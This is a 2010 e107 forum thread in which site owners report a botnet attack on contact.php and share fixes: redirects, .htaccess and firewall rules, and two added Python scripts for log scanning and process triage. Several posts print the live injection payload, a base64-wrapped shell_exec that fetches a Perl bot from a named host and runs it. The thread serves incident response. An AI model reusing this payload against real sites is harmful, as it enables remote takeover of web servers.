e107.org :: Forums :: e107 Support :: Core Support
Getting attacked
Fudsey
Sun Jun 06 2010, 09:37AM
I run 3 e107 websites and on Friday I noticed that one of my sites was getting hammered and I couldn't figure out why. I ended up with an upload total for the day of 178 GB (normal is around 200 MB). When I logged into my main site this AM it was really slow and I had 20 connections, all to the "contact.php" page, which I don't use.

I thought it might have been because I needed to update e107 from .19 to .22, but that didn't help. So I renamed contact.php and the attack has stopped (for now).

Does anyone have any ideas? Or has this happened to anyone else? Any answers could be helpful. Thanks.
Yakumo
Sun Jun 06 2010, 10:47AM
Same thing is happening to me, although it isn't much of a problem for me. I got 500+ bots earlier, all at contact.php.

Like Anime?
Snailman
Sun Jun 06 2010, 10:55AM

Same situation occurring for me now.

We have normality. I repeat, we have normality. Anything you still can't cope with is therefore your own problem.

------------------------------

"I drink mainly to sedate the tapeworm"
Yakumo
Sun Jun 06 2010, 11:00AM
I searched in Google and found some exploits that (I think) are supposed to affect versions 0.7.20 and below. I sent an email to the admins. So I guess try to update to 0.7.22 just to make sure.
Snailman
Sun Jun 06 2010, 11:03AM

I am running 0.7.22 and am getting the same spam attack. I may also rename my contact.php to slow this...

Edit: After renaming contact.php they are slowly dropping off.

208.113.193.12 is in contact
65.23.154.107 is in contact
78.157.108.97 is in contact
87.106.82.197 is in contact
12.33.10.228 is in contact
174.123.106.194 is in contact
193.9.21.20 is in contact
194.150.248.160 is in contact
195.13.221.178 is in contact
195.210.46.18 is in contact
202.191.37.3 is in contact
208.109.86.45 is in contact
212.116.150.113 is in contact
212.159.7.202 is in contact
212.227.114.68 is in contact
212.227.29.168 is in contact
212.227.29.45 is in contact
213.171.218.166 is in contact
216.120.254.101 is in contact
216.246.2.35 is in contact
217.64.195.229 is in contact
Snap - contact
71.43.100.244 is in contact
72.1.240.89 is in contact
72.52.191.183 is in contact
74.208.16.17 is in contact
77.232.83.2 is in contact
78.138.88.247 is in contact
81.175.61.205 is in contact
82.208.40.225 is in contact
85.12.33.50 is in contact
85.214.74.24 is in contact
87.108.28.195 is in contact
88.148.8.7 is in contact
88.213.130.60 is in contact
89.107.186.233 is in contact
89.108.67.73 is in contact
91.198.106.12 is in contact
fecnnews
Sun Jun 06 2010, 11:27AM

I too am getting a LOT of traffic to a site we normally do not have much at, looking at the contact.php page. I own the server, so I checked my email logs and such and they look normal (nothing going out of the mail server)... Looks like a group of hackers may be trying to learn some sort of exploit in the contact page, but email isn't going out from them.

--
It's all about Community!
MikeNL
Sun Jun 06 2010, 12:07PM
My main site has just been compromised too!

I don't know where they've entered, but suddenly Apache is starting a shell script:

```text
apache   12345  0.0  0.2   3944   564 ?        S    16:40   0:00 sh -c wget http : //zuo podgorz org/zuo/shb.pl -O /tmp/bo;perl /tmp/bo
apache   12346  0.0  0.7  31112  1856 ?        S    16:40   0:00 wget http : //zuo podgorz org/zuo/shb.pl -O /tmp/bo
```

and then it keeps starting an Apache process called 'rocknrollaaaa'. I haven't found that one yet.

When I keep all my config as it was but only remove my main site from the 'sites-enabled' folder, everything is OK, so I suppose it has to be something to do with that site.
septor
Sun Jun 06 2010, 12:27PM

Member Of The e107 Support Team
Open notepad (or whatever).

Create a new file.

Paste:
```php
<?php header("location:http://google.com/"); ?>
```


Save that as contact.php and upload/overwrite your existing contact.php file. This will send all traffic trying to locate your contact.php file to Google, which will more than likely have the means to deal with the traffic, plus locate those responsible (unlikely).

Alternatively, you can just comment out the existing contact.php file and add the above header() call:

```php
<?php
/*
+ ---------------------------------------------------------------------------+
|     e107 website system
|     ©Steve Dunstan 2001-2002
|     http://e107.org
|     jalist@e107.org
|
|     Released under the terms and conditions of the
|     GNU General Public License (http://gnu.org).
|
|     $Source: /cvs_backup/e107_0.7/contact.php,v $
|     $Revision: 11346 $
|     $Date: 2010-02-17 13:56:14 -0500 (Wed, 17 Feb 2010) $
|     $Author: secretr $
+----------------------------------------------------------------------------+
*/
header("location:http://www.google.com");
/*
require_once("class2.php");
// security image may be disabled by removing the appropriate shortcodes from the template.
require_once(e_HANDLER."secure_img_handler.php");
$sec_img = new secure_image;
require_once(HEADERF);

if (!$CONTACT_FORM)
{
    if (file_exists(THEME."contact_template.php"))
    {
        require_once(THEME."contact_template.php");
    }
    else
    {
        require_once(e_THEME."templates/contact_template.php");
    }
}

if(isset($_POST['send-contactus'])){
    $error = "";
    $sender_name = $tp->toEmail($_POST['author_name'],TRUE,"rawtext");
    $sender = check_email($_POST['email_send']);
    $subject = $tp->toEmail($_POST['subject'],TRUE,"rawtext");
    $body = $tp->toEmail($_POST['body'],TRUE,"rawtext");

    // Check Image-Code
    if (isset($_POST['rand_num']) && !$sec_img->verify_code($_POST['rand_num'], $_POST['code_verify']))
    {
        $error .= LANCONTACT_15."\\n";
    }

    // Check message body.
    if(strlen(trim($_POST['body'])) < 15)
    {
        $error .= LANCONTACT_12."\\n";
    }

    // Check subject line.
    if(strlen(trim($_POST['subject'])) < 2)
    {
        $error .= LANCONTACT_13."\\n";
    }

    if(!strpos(trim($_POST['email_send']),"@"))
    {
        $error .= LANCONTACT_11."\\n";
    }

    // Check email address on remote server (if enabled).
    if ($pref['signup_remote_emailcheck'] && $error == "")
    {
        require_once(e_HANDLER."mail_validation_class.php");
        list($adminuser,$adminhost) = split ("@", SITEADMINEMAIL);
        $validator = new email_validation_class;
        $validator->localuser= $adminuser;
        $validator->localhost= $adminhost;
        $validator->timeout=3;
        //    $validator->debug=1;
        //    $validator->html_debug=1;
        if($validator->ValidateEmailBox($sender) != 1)
        {
            $error .= LANCONTACT_11."\\n";
        }
    }

    // No errors - so proceed to email the admin and the user (if selected).
    if(!$error)
    {
        $body .= "\n\nIP:\t".USERIP."\n";
        if(USER)
        {
            $body .= "User:\t#".USERID." ".USERNAME."\n";
        }

        if(!$_POST['contact_person'] && isset($pref['sitecontacts'])) // only 1 person, so contact_person not posted.
        {
            if($pref['sitecontacts'] == e_UC_MAINADMIN)
            {
                $query = "user_perms = '0' OR user_perms = '0.' ";
            }
            elseif($pref['sitecontacts'] == e_UC_ADMIN)
            {
                $query = "user_admin = 1 ";
            }
            else
            {
                $query = "FIND_IN_SET(".$pref['sitecontacts'].",user_class) ";
            }
        }
        else
        {
            $query = "user_id = ".intval($_POST['contact_person']);
        }

        if($sql -> db_Select("user", "user_name,user_email",$query." LIMIT 1"))
        {
            $row = $sql -> db_Fetch();
            $send_to = $row['user_email'];
            $send_to_name = $row['user_name'];
        }
        else
        {
            $send_to = SITEADMINEMAIL;
            $send_to_name = ADMIN;
        }

        require_once(e_HANDLER."mail.php");
        $message = (sendemail($send_to,"[".SITENAME."] ".$subject, $body,$send_to_name,$sender,$sender_name)) ? LANCONTACT_09 : LANCONTACT_10;

        if(isset($pref['contact_emailcopy']) && $pref['contact_emailcopy'] && $_POST['email_copy'] == 1){
            sendemail($sender,"[".SITENAME."] ".$subject, $body,ADMIN,$sender,$sender_name);
        }

        $ns -> tablerender('', $message);
        require_once(FOOTERF);
        exit;
    }
    else
    {
        require_once(e_HANDLER."message_handler.php");
        message_handler("P_ALERT", $error);
    }
}

if(SITECONTACTINFO && $CONTACT_INFO)
{
    $text = $tp->parseTemplate($CONTACT_INFO, TRUE, $contact_shortcodes);
    $ns -> tablerender(LANCONTACT_01, $text,"contact");
}

if(isset($pref['sitecontacts']) && $pref['sitecontacts'] != 255)
{
    require_once(e_FILE."shortcode/batch/contact_shortcodes.php");
    $text = $tp->parseTemplate($CONTACT_FORM, TRUE, $contact_shortcodes);
    if(trim($text) != "")
    {
        $ns -> tablerender(LANCONTACT_02, $text, "contact");
    }
}

require_once(FOOTERF);
exit;
*/
?>
```


Using the above method, my site went from having 22 guests (usually 0, sometimes 1 or 2 if I've just released a plugin) down to 6 (as of a few minutes ago).


Security issue? e107 security is here to help.

My e107 related scripts can now be found on GitHub. Use at your own risk.
Public ready scripts will be pushed to plugins.e107 only.
fecnnews
Sun Jun 06 2010, 12:42PM

Our servers are set up pretty strictly security-wise, but there seems to be some group effort from many IP addresses (or anonymous proxies) to get access to upload a file and/or LOOK for a file at the website's root public_html section. LOTS of queries for ./help_us.php, which of course is not part of the e107 system as it is.

This file, help_us.php, MAY be something to look at in your site to see if it exists (planted there), and REMOVE IT if you find it.
knesz
Sun Jun 06 2010, 04:41PM
Snailman wrote ...

I am running 0.7.22 and am getting the same spam attack. I may also rename my contact.php to slow this...

Edit: After renaming contact.php they are slowly dropping off.

Looks like there has been some massive botnet scan worldwide.
I am admin of one server, hosting 400+ sites, but only one of them has e107 installed, which is currently suspended.
I did some quick analysis, and there is a Perl script behind it, generated by the apache user, which is reporting activity to an IRC botnet. Attacks on my server started at about 12 UTC.
BTW, one of the IPs listed above is mine.

Just for the info.
Yakumo
Sun Jun 06 2010, 10:40PM
Looks like they stopped now.
Nowwhat
Mon Jun 07 2010, 12:33AM

Member Of The e107 Support Team
Stopped?

My Apache error log file is full of these lines:

```text
[Mon Jun 07 00:00:04 2010] [error] [client w.y.z.w] [host www.papy-team.fr] script not found or unable to stat: /homez.46/papyteam/www/forum/help_us.php
```

About 15,000 of them last night alone!

I redirected them now with:

```apache
# RewriteEngine On must already be in effect for this file
RewriteCond %{REQUEST_URI} /forum/help_us.php
RewriteRule ^(.*) http://%{SERVER_NAME} [R,L]
```

in my root .htaccess.

Knowing where you are helps if you want to know where to go.
C6Dave
Mon Jun 07 2010, 01:30AM
fecnnews wrote ...

Our servers are set up pretty strictly security-wise, but there seems to be some group effort from many IP addresses (or anonymous proxies) to get access to upload a file and/or LOOK for a file at the website's root public_html section. LOTS of queries for ./help_us.php, which of course is not part of the e107 system as it is.

This file, help_us.php, MAY be something to look at in your site to see if it exists (planted there), and REMOVE IT if you find it.

Making sure you have a dedicated 404.html error page set up will stop the multiple database hits slowing the site down for a non-existent file.

If you have cPanel access on your server it's listed in 'Error pages' and you need to add something like:

```html
<!--#echo var="REMOTE_ADDR" --> <!--#echo var="REQUEST_URI" -->
I'm sorry, but the file you have requested does not exist.<br />
Please check your syntax and try again.
```

for each site in the 404 section.

"The irony of the Information Age is that it has given new respectability to uninformed opinion" - John Lawton 1995
Yakumo
Mon Jun 07 2010, 03:01AM
I spoke too soon, they're at it again, lol.
TheMadMonk
Mon Jun 07 2010, 06:02AM

Yeah, my site is being attacked like this too.

-=TheMadMonk=- Visit http://www.gamingmad.com
Tansas
Mon Jun 07 2010, 06:19AM

Stopped?

My site is under attack, but I have to update from 0.7.20 to 0.7.22.

My e107 Projects: Istanbul - Pharmazie - Gesundheit - Istanbul Guide
TheMadMonk
Mon Jun 07 2010, 06:22AM

I'm on 0.7.22 and still attacked; changing or removing contact.php looks like the way to go at the moment.
DJBob
Mon Jun 07 2010, 06:24AM
I've had a site attacked by this as well. I've looked into it and although the access log is showing the Russian IPs trying to get help_us.php (which doesn't exist), somehow Apache is serving contact.php.

I put some logging on that file separately and found that they were posting the following into the author_name POST var:

```text
[php]shell_exec(base64_decode(\" d2dldCBodHRwOi8venVvLnBvZGdvcnoub3JnL3p1by9zaGIucGwgLU8gL3RtcC9ibztwZXJsIC90bXAvYm8=\"));;die();[/php]
```

The encoded bit translates to:

```text
wget http://zuo.podgorz.org/zuo/shb.pl -O /tmp/bo;perl /tmp/bo
```

I've solved it by not allowing PHP to run shell_exec, but it seems that the real solution is to fix the exploit in the contact page.
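As an added example, not code from this thread or from e107, here is a small Python scanner for the kind of per-request logging DJBob describes bolting onto contact.php. It takes each logged POST body, pulls every form field out of it, looks for `[php]...[/php]` bbcode in any field (not just author_name), and decodes each `base64_decode()` argument so the operator can read the command the bot would have run. The "timestamp client uri body" log format and the benign first request are constructed for the example; the payload is the one quoted in the post above, and the decoded command is what the thread already shows.

```python
import base64
import re
import urllib.parse

# The injected author_name value quoted above, exactly as it arrived
# (the backslashes before the quotes are part of the payload).
PAYLOAD = (
    '[php]shell_exec(base64_decode(\\" '
    'd2dldCBodHRwOi8venVvLnBvZGdvcnoub3JnL3p1by9zaGIucGwgLU8gL3RtcC9ibztwZXJsIC90bXAvYm8='
    '\\"));;die();[/php]'
)

# Constructed log lines in a hypothetical "timestamp client=... uri=... body=..."
# format, the sort of thing a one-off logger in contact.php might write.
# The first is a normal submission; the second carries the payload.
SAMPLE_LOG = [
    "2010-06-07T06:10:01 client=198.51.100.23 uri=/contact.php body="
    + urllib.parse.urlencode({"author_name": "Bob", "email_send": "bob@example.com",
                              "subject": "hello", "body": "this is a genuine message"}),
    "2010-06-07T06:10:05 client=203.0.113.9 uri=/contact.php body="
    + urllib.parse.urlencode({"author_name": PAYLOAD, "email_send": "x@x.x",
                              "subject": "xx", "body": "x" * 20}),
]

LINE_RE = re.compile(r"client=(?P<client>\S+) uri=(?P<uri>\S+) body=(?P<body>.*)$")
# bbcode tags are case-insensitive and a payload may span lines.
PHP_BBCODE_RE = re.compile(r"\[php\](?P<code>.*?)\[/php\]", re.IGNORECASE | re.DOTALL)
# Matches base64_decode("...") or base64_decode(\"...\"). The character class
# excludes quotes and backslashes, so the match stops at the closing quote.
B64_ARG_RE = re.compile(r"base64_decode\(\s*\\?[\"']([A-Za-z0-9+/=\s]+)\\?[\"']\s*\)")


def decode_b64_args(code):
    """Decode every base64_decode() argument found in a PHP snippet."""
    decoded = []
    for m in B64_ARG_RE.finditer(code):
        raw = re.sub(r"\s+", "", m.group(1))  # the real payload has a leading space
        try:
            decoded.append(base64.b64decode(raw, validate=True).decode("utf-8", "replace"))
        except ValueError:
            decoded.append("<undecodable>")
    return decoded


def inspect_post(body):
    """Return one finding per [php]...[/php] block in any field of a POST body."""
    findings = []
    for field, values in urllib.parse.parse_qs(body, keep_blank_values=True).items():
        for value in values:
            for m in PHP_BBCODE_RE.finditer(value):
                code = m.group("code")
                findings.append({"field": field, "code": code,
                                 "decoded": decode_b64_args(code)})
    return findings


def scan_log(lines):
    """Run inspect_post over every parsable log line, tagging hits with the client IP."""
    hits = []
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        for finding in inspect_post(m.group("body")):
            finding["client"] = m.group("client")
            hits.append(finding)
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['client']} field={hit['field']} would run: {hit['decoded']}")
```

Searching every field rather than only author_name matters because the same bbcode parser handles the other text fields too; and decoding the base64 is what turns a blocked request into an indicator (the download host and the dropped path `/tmp/bo`) that the host-side checks in this thread can be built on.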
Mojo Will
Mon Jun 07 2010, 06:58AM

With your firewall on hosting:

Deny incoming from 174.136.96.138 on all ports
Deny outgoing to 174.136.96.138 on all ports

This will stop the remote Perl being fetched; then kill all PIDs with that as the command. If not, it will hijack your httpd with rocknrollaaaa.

Finally, I think I sorted out my server by adding better security. Thanks to Cam for his help on IRC.

Mostly Mojo
Premium Marketing, Design and Development
xenthemes.com
Want some proper themes? xenthemes have them!
@theMojoWill
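The firewall-then-kill procedure above, as an added Python example that is not the thread's or e107's code. It parses `ps aux` output, flags processes that match the indicators named in this thread (the wget one-liner writing to /tmp/bo, `perl /tmp/bo`, and the rocknrollaaaa process) and, more generally, any process owned by the web-server user that is not the web server binary itself, then emits the iptables and kill commands in the order Mojo Will gives: firewall the C2 first so the dropper cannot re-download, kill second. The ps listing is constructed, modelled on the two lines MikeNL posted; the C2 address is the one Mojo Will named; the lists of web-server users and binaries are assumptions to adjust for your host.

```python
import re

# Constructed `ps aux` listing modelled on MikeNL's two lines above. PIDs,
# times, the two httpd rows and the perl/rocknrollaaaa rows are made up.
SAMPLE_PS = """\
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root      1001  0.0  1.0  22000  4000 ?        Ss   16:00   0:01 /usr/sbin/apache2 -k start
apache    1002  0.0  0.9  22000  3800 ?        S    16:00   0:00 /usr/sbin/apache2 -k start
apache   12345  0.0  0.2   3944   564 ?        S    16:40   0:00 sh -c wget http://zuo.podgorz.org/zuo/shb.pl -O /tmp/bo;perl /tmp/bo
apache   12346  0.0  0.7  31112  1856 ?        S    16:40   0:00 wget http://zuo.podgorz.org/zuo/shb.pl -O /tmp/bo
apache   12350  0.1  0.5  18000  2400 ?        S    16:41   0:00 rocknrollaaaa
apache   12351  0.0  0.5  18000  2400 ?        S    16:41   0:00 perl /tmp/bo
"""

# Assumed account and binary names; adjust for the distribution in use.
WEB_USERS = {"apache", "www-data", "httpd", "nobody"}
SERVER_BINARIES = {"httpd", "apache2", "httpd.worker", "httpd.prefork"}
# Indicators named in this thread: the downloader one-liner, the file it
# drops, and the process that replaced httpd.
IOC_PATTERNS = {
    "wget-to-tmp": r"\bwget\b.*\s-O\s+/tmp/",
    "perl-from-tmp": r"\bperl\s+/tmp/",
    "rocknrollaaaa": r"\brocknrollaaaa\b",
}
C2_IP = "174.136.96.138"  # the address Mojo Will blocked above


def parse_ps(text):
    """Turn `ps aux` output into dicts; COMMAND is the 11th column and may contain spaces."""
    procs = []
    for line in text.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 10)
        if len(parts) < 11:
            continue
        procs.append({"user": parts[0], "pid": int(parts[1]), "cmd": parts[10]})
    return procs


def is_server_binary(cmd):
    exe = cmd.split()[0].rsplit("/", 1)[-1]
    return exe in SERVER_BINARIES


def triage(ps_text):
    """Flag processes matching an IOC, or owned by the web user but not the web server."""
    suspects = []
    for proc in parse_ps(ps_text):
        reasons = [name for name, pat in IOC_PATTERNS.items() if re.search(pat, proc["cmd"])]
        if proc["user"] in WEB_USERS and not is_server_binary(proc["cmd"]):
            reasons.append("non-server process owned by web-server user")
        if reasons:
            suspects.append({**proc, "reasons": reasons})
    return suspects


def response_commands(suspects, c2_ip=C2_IP):
    """Block the C2 in both directions first, then kill, so the dropper cannot re-fetch."""
    cmds = [
        f"iptables -I INPUT -s {c2_ip} -j DROP",
        f"iptables -I OUTPUT -d {c2_ip} -j DROP",
    ]
    pids = sorted({s["pid"] for s in suspects})
    if pids:
        cmds.append("kill -9 " + " ".join(map(str, pids)))
    return cmds


if __name__ == "__main__":
    found = triage(SAMPLE_PS)
    for s in found:
        print(f"{s['pid']:>6} {s['user']:<8} {s['cmd'][:50]:<50} {', '.join(s['reasons'])}")
    print("\n".join(response_commands(found)))
```

Two caveats before running the printed commands for real. A process can overwrite its own argv, so a `ps` entry named rocknrollaaaa should be confirmed with `readlink /proc/<pid>/exe` and `/proc/<pid>/cmdline` before it is killed, and the reverse is also true (a hijacked worker can keep the httpd name). And the download host in the one-liner is not necessarily the same machine as the IP blocked here, so resolve it and block it too, or the next request will simply fetch the script again.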
ChicksHateMe
Mon Jun 07 2010, 07:19AM
I am here to join in too.

I have this happening. Seems the only files affected for me were index.php in the admin and root.

I disabled my contact.php. I had been getting a lot of undeliverables for an email; I thought it was just stolen.

I have some sites as far back as 7.11.

Anyone know if there are a lot of steps to going from 7.11 to current? Or maybe I should just wait for .23.

You'd think these hacks would go after the big people and money, not us poor peeps, geesh.

Good luck all.

I am SOOOO old, I still do all my graphic designs on the original Lite-Brite.